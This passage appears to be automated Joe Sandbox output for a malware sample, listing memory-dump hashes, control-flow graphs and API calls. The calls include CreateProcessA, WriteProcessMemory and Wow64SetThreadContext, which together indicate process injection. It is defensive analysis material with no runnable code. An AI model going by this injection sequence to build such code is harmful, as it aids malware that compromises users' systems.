                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq$,bq$,bq$Hbq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2701683455
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 50db104a7fd3be3b901292e8d46c6854c1f07ba074022ec07ed900f9398c417d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: dfc7ef9fee43ab6d685d5b02624156e1b86594686fb6d01bfbea9f0f4602de05
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50db104a7fd3be3b901292e8d46c6854c1f07ba074022ec07ed900f9398c417d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EB28EB0A002599FCF15DF69C884AAEBBF2FF89384F158569E405AB3A1DB30DD41DB50
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-183542557
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f9c4b9517c6e05c5c01a5c073ec1813e51f5b851c79adad033acdedae5ada039
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9ae08e7796f2fbc2f388654eb5d4a8fb7bf40f87ec4106c11bf6a90d51564f73
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9c4b9517c6e05c5c01a5c073ec1813e51f5b851c79adad033acdedae5ada039
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBA2A2B0A00606DFCF15CF68C884AAEBBB6FF89380F158969E405DB269D731EC55CB51
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: Hbq$Hbq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-4258043069
                                                                                                                                                                                                                                                                                                                    • Opcode ID: cfa41ad274c9bebf25ff73614d0d9c2f2dd9d78dba1e332461b8cd5b05352c17
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c5c5f75de66b365f4dc349c083daed6a6505780f25c17e2dcbcf9a5c64f496d7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfa41ad274c9bebf25ff73614d0d9c2f2dd9d78dba1e332461b8cd5b05352c17
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9322D7B19002469FDF12DF68C984AFE7BFAEF4A380F158466E440AB261D7389D45CB71
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: dLdq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3390252261
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3ebd57f6cc9e2404d1de9a3800b6f62119b973057c99adb7b3819f582998e8b4
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 93ffb496a615cea9d996e8a9173ae083aad04399a6c5b7d68ad61dc71a88950d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ebd57f6cc9e2404d1de9a3800b6f62119b973057c99adb7b3819f582998e8b4
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0702D5F1F012059BDF188FB9C8547AE7BA3ABC5394F148529EA159B394DB34A842CF81
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817227467.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7c30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: 3}
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2000073754
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f408a951260092dcdd05cb41b59f07a64683b81517f6cc5af00fcd3ac318eb6e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c0ede18fdab2f2f966e281eb262e182041a1f3dd7a2844b846a40ca5181a3702
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f408a951260092dcdd05cb41b59f07a64683b81517f6cc5af00fcd3ac318eb6e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9D19BB1B016058FEB29EB75C890BAEB7F7AF89700F14486ED146CB290DB75E901CB51
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817227467.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7c30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4c08002ed2f611eb8a26eec6afc0bcfb65418bc19a955c5ab8a79af83ee17b23
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 457e60812309deae203a453a2404028669fde7bd95401c733a9279d96d2c60f6
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c08002ed2f611eb8a26eec6afc0bcfb65418bc19a955c5ab8a79af83ee17b23
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D427DB0A012059FCB14DF79D894A6EBBF2FF89604F248569D409AB391DF35EC46CB81

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1143 2f7c630-2f7c6cf GetCurrentProcess 1148 2f7c6d1-2f7c6d7 1143->1148 1149 2f7c6d8-2f7c70c GetCurrentThread 1143->1149 1148->1149 1150 2f7c715-2f7c749 GetCurrentProcess 1149->1150 1151 2f7c70e-2f7c714 1149->1151 1153 2f7c752-2f7c76d call 2f7cc19 1150->1153 1154 2f7c74b-2f7c751 1150->1154 1151->1150 1157 2f7c773-2f7c7a2 GetCurrentThreadId 1153->1157 1154->1153 1158 2f7c7a4-2f7c7aa 1157->1158 1159 2f7c7ab-2f7c80d 1157->1159 1158->1159
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 02F7C6BE
                                                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02F7C6FB
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 02F7C738
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02F7C791
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1756246856.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f70000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6bf93d94f049ea3b83fa165b0aa0fb7021fb6f88055f4d0615b0e1fe40afa9a1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9be9509bbaa6ca24cc659e93715ad01631ef51041ad5072bbad4f7c09907ca03
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bf93d94f049ea3b83fa165b0aa0fb7021fb6f88055f4d0615b0e1fe40afa9a1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F5166B09112498FDB14DFA9D548BAEBFF1FF48308F20C46AD119A7260DB349884CF69

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1166 2f7c640-2f7c6cf GetCurrentProcess 1170 2f7c6d1-2f7c6d7 1166->1170 1171 2f7c6d8-2f7c70c GetCurrentThread 1166->1171 1170->1171 1172 2f7c715-2f7c749 GetCurrentProcess 1171->1172 1173 2f7c70e-2f7c714 1171->1173 1175 2f7c752-2f7c76d call 2f7cc19 1172->1175 1176 2f7c74b-2f7c751 1172->1176 1173->1172 1179 2f7c773-2f7c7a2 GetCurrentThreadId 1175->1179 1176->1175 1180 2f7c7a4-2f7c7aa 1179->1180 1181 2f7c7ab-2f7c80d 1179->1181 1180->1181
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 02F7C6BE
                                                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02F7C6FB
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 02F7C738
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02F7C791
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1756246856.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f70000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 56505d540a56a0e67b1ae898dbf6bdeb27fc03f1b4c9f0044f1f977ff1671ae9
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b14ffcbc5998ce54c88d5c88864455299cc0c796efd189fcceb6c246181fa9bb
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56505d540a56a0e67b1ae898dbf6bdeb27fc03f1b4c9f0044f1f977ff1671ae9
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 115167B09112498FDB14DFA9D548BAEBBF1FB48308F20C46AD119A7360DB349884CF65
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0777AF47
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4003305895ff482afe026008a9583e7836b6e04c15e24f69c3fae2444a34c287
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4aa526c7b47780b34cc8c0fded7664e482ee4ee6229a0283148d2f093ed8def4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4003305895ff482afe026008a9583e7836b6e04c15e24f69c3fae2444a34c287
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AA17FB1D0021ADFEF20DF68C8417EDBBB2EF48350F1585AAD818A7254DB749985CF92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0777AF47
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 847c0c9a75eed463646201dc566debe27632309e23fc0bfca2067ab4482c357c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: bb0996829a1af65641ea968ed9353500d8e88fd849f92ea6ca67aced2ce0cd41
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 847c0c9a75eed463646201dc566debe27632309e23fc0bfca2067ab4482c357c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29917FB1D00219CFDF10DF68C941BEDBBB2BF48350F1485AAD818A7254DB749985CF92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7A5FE
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1756246856.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f70000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a682f84aa6dcb715c3ac2058b002aa3e724cc4fb99739d429419bd3c4bc374dc
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 80ba66cb942c0f7e0ffcf6afc3252097bd9d985a0230dcc4a9937c2171501563
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a682f84aa6dcb715c3ac2058b002aa3e724cc4fb99739d429419bd3c4bc374dc
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D97122B0A00B058FDB24DF29D54475ABBF1BF88344F108A2ED58A9BA50DB75E849CF90
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 07C35F30
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817227467.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7c30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CurrentThread
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2882836952-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: eaaf8c55e76c3295231a838fca5de612773b2a2d5078acfe694b48ed252c5710
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5a95413baa8fec8c2df66f976e9927ca10713eabc44dafc20d9e7723fcfd307f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaaf8c55e76c3295231a838fca5de612773b2a2d5078acfe694b48ed252c5710
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63613AB0E11209EFDB14DFA9E585BADBBB1BF48314F148069E401BB391CB799985CF90
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0777A120
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c4bd82810b824c80c975f059bc7aba85f818dd2a8f87a76346dbd2d20bc2b374
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a91456e8e15c91b96f8d80047060a64ffedb75574f9838764a229e2fa5150f24
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4bd82810b824c80c975f059bc7aba85f818dd2a8f87a76346dbd2d20bc2b374
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A4176B2800349DFDF20CFA9C844BEEBBF1EF48364F10882AE558A7251D7799945DB61
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 07C36905
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817227467.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7c30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c2ae0c5d55d1a7ec8c2ceead383236adb485fada65b457e634a76ba5ed063318
                                                                                                                                                                                                                                                                                                                    • Instruction ID: fab0eecd9657148c500db8b6ceea0c7065533cb8a31ee3ea697744e382327a1c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2ae0c5d55d1a7ec8c2ceead383236adb485fada65b457e634a76ba5ed063318
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C821A1B1808385DFCB11CF69C844BDABFF4EB0A314F1484AAD494BB252C278A944CBA1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0777A120
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6d1f6e6d939628fb7b3ac75b685776abf87b37d1960258877f95f108f93b8bb5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b380e5327c0ef5c092fc233d74edef5f8171fc7e85a6fc0b6de0edeefda71997
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d1f6e6d939628fb7b3ac75b685776abf87b37d1960258877f95f108f93b8bb5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 352124B19003599FDF10DFAAC885BDEBBF5FF48310F10882AE958A7250C7789944CBA4
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0A86145A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1823785918.000000000A860000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A860000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a860000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CurrentThread
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2882836952-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 21f057891ff48055a01e1681c8b76327c32ecf6a458b5ad8fd13789642d3d1bd
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f936e4b7cc56c1e5171f70354efdc293a1d5d12cccace005bceed3b478216157
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21f057891ff48055a01e1681c8b76327c32ecf6a458b5ad8fd13789642d3d1bd
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B73136B09042498FCB10DFA9D544ADEFBF1FB48318F14C569D459AB316C374A948CFA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07779E86
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 21b857e225e1527e99089dbd41eebd46849071db2a5cc2f23909c47c17f6964e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4d9d1fbc88975c9a9c2a8764435b0e6ebc739a3de6efb54914fb6a07631a676c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21b857e225e1527e99089dbd41eebd46849071db2a5cc2f23909c47c17f6964e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 762159B2D002098FCB10DFA9C5857EEBBF4BF48314F10882AD559A7240C778A944CFA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7CD17
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1756246856.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f70000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b1bf14bea2193cedf1ebd80c8095ccabb31d79f6b1675b3d5be03458b08ffed9
                                                                                                                                                                                                                                                                                                                    • Instruction ID: decfd31884126497e4590519b60542783b1f6d5148f7850f79825f4cb31cd0c2
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1bf14bea2193cedf1ebd80c8095ccabb31d79f6b1675b3d5be03458b08ffed9
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B421E0B6D00219DFDB10CFAAD584ADEBFF5FB08314F24845AE918A7250C378A954CFA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07779E86
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: bb7a3d94e023f724257d22b00c490d1cf95e0efdb666c2900fe7475d2d46b24d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ea4f8da50f6410d740d10bc47bb211942e5aa8111b43efaf9f5d0e0b24e442ca
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb7a3d94e023f724257d22b00c490d1cf95e0efdb666c2900fe7475d2d46b24d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78213AB1D043098FDB10DFAAC4857EEBBF4EF48324F108429D559A7240C778A944CFA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0A86145A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1823785918.000000000A860000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A860000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a860000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CurrentThread
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2882836952-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 802e28e5561ff2ee939870a190989f26b6be4468441ffc857d841b0147598356
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e15ae07227acc8e2a4fc533beb5a47b0abc10497d1619674da0077db204ac3e7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 802e28e5561ff2ee939870a190989f26b6be4468441ffc857d841b0147598356
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D2125B090424A8FDB10DF99D544ADEFBF1FB48318F14C569D419AB316C378A988CFA9
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7CD17
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1756246856.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
